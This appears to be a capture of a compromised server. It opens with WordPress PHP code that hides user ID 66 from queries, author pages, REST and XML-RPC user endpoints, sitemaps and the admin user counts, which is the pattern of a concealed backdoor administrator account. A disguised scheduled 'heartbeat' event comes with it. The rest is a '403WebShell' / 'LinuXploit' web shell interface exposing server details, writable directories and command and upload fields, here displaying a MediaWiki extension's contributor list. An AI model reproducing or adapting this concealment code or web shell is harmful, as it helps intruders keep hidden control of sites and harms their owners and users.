add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/wiki/extensions/ConfirmEdit/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/wiki/extensions/ConfirmEdit/AUTHORS.txt
Contributors (alphabetically)

Aaron Schulz <aschulz@wikimedia.org>
addshore <addshorewiki@gmail.com>
Ævar Arnfjörð Bjarmason <avar@users.mediawiki.org>
Alexandre Emsenhuber <ialex@users.mediawiki.org>
Alex Monk <krenair@gmail.com>
Alex Z. <mrzman@users.mediawiki.org>
Amir E. Aharoni <amire80@users.mediawiki.org>
Anders Wegge Jakobsen <wegge@users.mediawiki.org>
Andrew Garrett <werdna@users.mediawiki.org>
Antoine Musso <hashar@free.fr>
Aryeh Gregor <simetrical@users.mediawiki.org>
Bartosz Dziewoński <matma.rex@gmail.com>
Bertrand Grondin <grondin@users.mediawiki.org>
Brad Jorsch <anomie.wikipedia@gmail.com>
Brian Wolff <bawolff+wn@gmail.com>
Brion Vibber <brion@pobox.com>
Bryan Tong Minh <btongminh@users.mediawiki.org>
Chad Horohoe <chadh@wikimedia.org>
Charles Melbye <charlie@users.mediawiki.org>
CSteipp <csteipp@wikimedia.org>
Derk-Jan Hartman <hartman@users.mediawiki.org>
EBernhardson <ebernhardson@wikimedia.org>
emufarmers <emufarmers@gmail.com>
Federico Leva <federicoleva@tiscali.it>
Florian Schmidt <florian.schmidt.stargatewissen@gmail.com>
Gergő Tisza <gtisza@wikimedia.org>
Gilles Dubuc <gdubuc@wikimedia.org>
Glaisher <glaisher.wiki@gmail.com>
Greg Sabino Mullane <greg@users.mediawiki.org>
Happy-melon <happy-melon@users.mediawiki.org>
Huji <huji@users.mediawiki.org>
Ivan Lanin <ivanlanin@users.mediawiki.org>
Jackmcbarn <jackmcbarn@gmail.com>
jdlrobson <jdlrobson@gmail.com>
Jeroen De Dauw <jeroendedauw@users.mediawiki.org>
Jimmy Collins <collinj@users.mediawiki.org>
John Du Hart <johnduhart@users.mediawiki.org>
Kai_Nissen_(WMDE) <kai.nissen@wikimedia.de>
Kunal Mehta <legoktm@gmail.com>
lalei <kurarei@gmail.com>
Leon Weber <leon@users.mediawiki.org>
Luis Felipe Schenone <schenonef@gmail.com>
Marius Hoch <hoo@online.de>
Mark A. Hershberger <mah@everybody.org>
Matthew Flaschen <mflaschen@wikimedia.org>
Max Semenik <maxsem.wiki@gmail.com>
Nick Jenkins <nickj@users.mediawiki.org>
Niklas Laxström <niklas.laxstrom@gmail.com>
Ori Livneh <ori@wikimedia.org>
Paladox <thomasmulhall410@yahoo.com>
Peter Gehres <pgehres@wikimedia.org>
Platonides <platonides@gmail.com>
Purodha B Blissenbach <purodha@users.mediawiki.org>
Raimond Spekking <raimond.spekking@gmail.com>
Ricordisamoa <ricordisamoa@openmailbox.org>
River Tarnell <river@users.mediawiki.org>
Roan Kattouw <roan.kattouw@gmail.com>
Rob Church <robchurch@users.mediawiki.org>
Rotem Liss <rotem@users.mediawiki.org>
Sam Reed <reedy@wikimedia.org>
Shinjiman <shinjiman@users.mediawiki.org>
Siebrand Mazeland <siebrand@kitano.nl>
Southparkfan <southparkfan223@hotmail.com>
S Page <spage@wikimedia.org>
Sumit Asthana <asthana.sumit23@gmail.com>
Sven Heinemann <bachsau@users.mediawiki.org>
Tacsipacsi <tacsipacsi@jnet.hu>
tholam <t.lam@lamsinfosystem.com>
Timo Tijhof <krinklemail@gmail.com>
Tim Starling <tstarling@wikimedia.org>
Tobias <churchofemacs@users.mediawiki.org>
tonythomas01 <01tonythomas@gmail.com>
Translation updater bot <l10n-bot@translatewiki.net>
Umherirrender <umherirrender_de.wp@web.de>
Yaron Koren <yaron57@gmail.com>
Yuki Shira <shirayuking@gmail.com>
YuviPanda <yuvipanda@gmail.com>

Youez - 2016 - github.com/yon3zu
LinuXploit